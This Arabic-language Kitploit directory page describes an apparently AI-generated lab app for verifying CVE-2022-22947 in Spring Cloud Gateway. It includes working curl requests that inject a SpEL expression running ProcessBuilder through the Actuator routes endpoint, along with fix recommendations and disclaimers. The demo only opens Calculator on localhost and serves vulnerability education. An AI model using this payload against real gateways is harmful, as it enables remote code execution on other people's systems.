Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22947-pb-ai — تطبيق مُولَّد بالذكاء الاصطناعي للتحقق من الثغرات الأمنية | Kitploit
أدوات/GitHubGitHub/skysliently/cve-2022-22947-pb-ai
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار أمان APIالتعلم والتعليم
GitHubskysliently/cve-2022-22947-pb-ai

CVE-2022-22947-pb-ai

تطبيق مُولَّد بالذكاء الاصطناعي للتحقق من الثغرات الأمنية

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تطبيق التحقق من ثغرة CVE-2022-22947 في Spring Cloud Gateway

هذا تطبيق Spring Cloud Gateway مخصص لعرض والتحقق من ثغرة CVE-2022-22947. يستخدم التطبيق إصدارًا قابلًا للاستغلال من Spring Cloud Gateway، ويمكن من خلاله تنفيذ كود عشوائي عبر نقاط نهاية Actuator.

نظرة عامة على الثغرة

CVE-2022-22947 هي ثغرة تنفيذ كود عن بُعد في Spring Cloud Gateway. يمكن للمهاجم إضافة مسارات تحتوي على تعبيرات SpEL خبيثة ديناميكيًا عبر نقاط نهاية Actuator لتنفيذ كود عشوائي.

المتطلبات البيئية

  • Java 11+
  • Maven 3.6+
  • نظام macOS (للتجربة مع الآلة الحاسبة)

تشغيل التطبيق

root@kitploit:~
mvn spring-boot:run

سيتم تشغيل التطبيق على http://localhost:8080.

خطوات التحقق من الثغرة

الخطوة الأولى: إضافة مسار خبيث

أرسل طلب POST إلى نقطة النهاية /actuator/gateway/routes/test لإضافة مسار يحتوي على تعبير SpEL خبيث:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'

الخطوة الثانية: تحديث المسار

أرسل طلب POST إلى نقطة النهاية /actuator/gateway/refresh لتحديث المسار:

root@kitploit:~
curl -X POST http://localhost:8080/actuator/gateway/refresh

الخطوة الثالثة: تشغيل الكود الخبيث

قم بالوصول إلى المسار الخبيث لتشغيل الكود:

root@kitploit:~
curl http://localhost:8080/test

النتيجة المتوقعة

بعد استغلال الثغرة بنجاح، سيتم تشغيل تطبيق الآلة الحاسبة على macOS.

معلومات الطلبات الرئيسية

1. طلب إضافة المسار الخبيث

نقطة النهاية: POST /actuator/gateway/routes/test

ترويسة الطلب:

root@kitploit:~
Content-Type: application/json

جسم الطلب:

root@kitploit:~
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}

2. طلب تحديث المسار

نقطة النهاية: POST /actuator/gateway/refresh

3. طلب تشغيل الثغرة

نقطة النهاية: GET /test

تحليل الثغرة

تسمح هذه الثغرة للمهاجم بإضافة مسارات ديناميكيًا عبر نقاط نهاية Actuator، واستخدام تعبيرات SpEL في مرشحات المسار لتنفيذ كود عشوائي. يكمن جوهر الثغرة في المعالجة غير الآمنة لتعبيرات SpEL في إعدادات المسارات داخل Spring Cloud Gateway.

توصيات الإصلاح

  1. قم بالترقية إلى Spring Cloud Gateway 3.1.1+ أو 3.0.7+
  2. قم بتعطيل نقاط نهاية Actuator أو تقييد الوصول إليها
  3. استخدم Spring Security لحماية نقاط نهاية Actuator

معلومات الإصدار

  • Spring Boot: 2.6.2
  • Spring Cloud: 2021.0.0
  • Spring Cloud Gateway: 3.1.0 (إصدار قابل للاستغلال)

ملاحظات

⚠️ تحذير أمني: هذا التطبيق مخصص للأغراض التعليمية والبحث الأمني فقط. لا تستخدم أو تنشر هذا التطبيق في بيئات الإنتاج.

⚠️ بيان قانوني: عند استخدام هذا التطبيق لاختبار الثغرات، تأكد من حصولك على التصريح المناسب. قد يؤدي الاختبار غير المصرح به إلى انتهاك القوانين واللوائح.

تنزيل الأداة